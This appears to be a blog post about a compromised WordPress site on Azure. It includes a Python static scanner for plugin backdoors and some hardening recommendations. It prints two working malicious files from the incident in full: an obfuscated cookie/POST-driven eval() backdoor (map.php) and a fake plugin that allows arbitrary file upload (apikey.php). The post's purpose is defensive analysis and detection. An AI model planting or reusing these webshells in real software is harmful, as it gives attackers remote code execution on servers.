
Malware Wordpress on Azure

Dave Rendón
MVP

Recently received a security alert on a WordPress web app running on Azure:

1. There was a non-recognized authentication as admin user

2. The user uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php

3. The user performed a "test" through the "plugin"

Example of the code map.php:

<?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}}

Example of code apikey.php:

<?php
/**
 * @package api key
 */
/*
Plugin Name: api key
*/

if ("hello"==$_GET["test"])
{
 echo "testtrue";
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
 move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]);
 echo "true";
}
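The two files above share three traits that a defender can key on without decoding anything: a function table assembled from string fragments ('str_' .'rot13') so that grep for the decoder names finds nothing, request data (cookie or POST body) feeding eval(), and a plugin that writes an upload to a path taken straight from the client-supplied filename. As an added example (not from this post, Sucuri or WordPress), the Python script below walks a plugins directory, scores each PHP file against those traits and returns a verdict per file. The plugin layout (one directory per plugin) and the three sample plugins it writes into a temporary directory are constructed for the demo; the "map-like" sample carries the indicators only and does not contain a working loader.

```python
"""Static triage of WordPress plugin files for the indicators seen in the
map.php and apikey.php samples. Added example; the sample files and the
temporary plugin directory are constructed here, not taken from a real site."""
import os
import re
import tempfile

# Rule table: (rule name, regex, what a hit means to the analyst).
RULES = [
    ("eval-call", re.compile(r"@?\beval\s*\(", re.I),
     "eval() inside a plugin; legitimate plugins almost never need it"),
    ("decoder-chain", re.compile(r"\b(str_rot13|strrev|pack|base64_decode|gzinflate)\b", re.I),
     "string decoders typical of obfuscated loaders, as bare names or quoted strings"),
    ("split-name", re.compile(r"'[a-z_0-9]+'\s*\.\s*'[a-z_0-9]+'", re.I),
     "names built from concatenated fragments such as 'str_' .'rot13', which defeats grep"),
    ("request-input", re.compile(r"\$_(COOKIE|POST|GET|REQUEST)\s*\[", re.I),
     "reads request data; benign alone, a backdoor next to eval()"),
    ("unrestricted-upload",
     re.compile(r"move_uploaded_file\s*\(.*?\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]name['\"]\s*\]",
                re.I | re.S),
     "stores an upload under the client-supplied filename with no type or path check"),
]


def scan_source(src):
    """Return [(rule name, line number of first hit)] for one PHP source string."""
    findings = []
    for name, rx, _ in RULES:
        m = rx.search(src)
        if m:
            findings.append((name, src.count("\n", 0, m.start()) + 1))
    return findings


def classify(findings):
    """Turn rule hits into a verdict; the combination matters more than any single hit."""
    names = {name for name, _ in findings}
    if "unrestricted-upload" in names:
        return "arbitrary-upload"
    if "eval-call" in names and names & {"decoder-chain", "split-name", "request-input"}:
        return "backdoor"
    if names & {"eval-call", "decoder-chain", "split-name"}:
        return "suspicious"
    return "clean"


def scan_plugins(root):
    """Walk a wp-content/plugins tree and return {relative path: (verdict, findings)}."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_source(fh.read())
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            results[rel] = (classify(findings), findings)
    return results


# Constructed sample plugins (assumed layout: one directory per plugin).
SAMPLES = {
    "hello-bar/hello-bar.php": """<?php
/*
Plugin Name: constructed benign sample
*/
function hb_shortcode($atts) { return esc_html(get_option('hb_text', 'hello')); }
add_shortcode('hb', 'hb_shortcode');
$tab = isset($_GET['tab']) ? sanitize_key($_GET['tab']) : 'main';
""",
    "map-like/map.php": """<?php
// constructed sample carrying the indicators of the map.php loader; not a working payload
$fn = Array('str_' .'rot13', 'pack', 'st' .'rrev');
$in = isset($_COOKIE['k']) ? $_COOKIE['k'] : @$_POST['k'];
$decoded = '';
if (!empty($decoded)) { @eval($decoded); exit(); }
""",
    "apikey-like/apikey.php": """<?php
/*
Plugin Name: constructed uploader sample
*/
if ("hello" == $_GET["test"]) { echo "testtrue"; }
if (is_uploaded_file($_FILES["f"]["tmp_name"])) {
    move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"]);
    echo "true";
}
""",
}


def demo():
    """Write the constructed samples to a temp dir, scan them, return {path: verdict}."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return {rel: verdict for rel, (verdict, _) in scan_plugins(root).items()}


if __name__ == "__main__":
    for rel, verdict in sorted(demo().items()):
        print(f"{verdict:17} {rel}")
```

Point scan_plugins() at a site's wp-content/plugins directory (or at a copy pulled from the App Service file system) and review everything that is not "clean"; the line numbers in the findings tell you where to look first. The rules are deliberately loose and will flag some legitimate code that uses base64_decode or reads $_POST, so the verdict is a triage order, not a final answer.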

Image of the "plugin" on the WordPress site:

wordpress-malicious-code.png

Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a WordPress installation, even using some tools such as the online Sucuri scanner.

Recommendations:

- Enable the Sucuri plugin on your WP
- Enable WAF v2 on your web app
- If possible, isolate your resource using an App Service Environment
- Harden your NSG(s)
- Perform an SSL test on your web app

If you have any other tips or recommendations, please share!
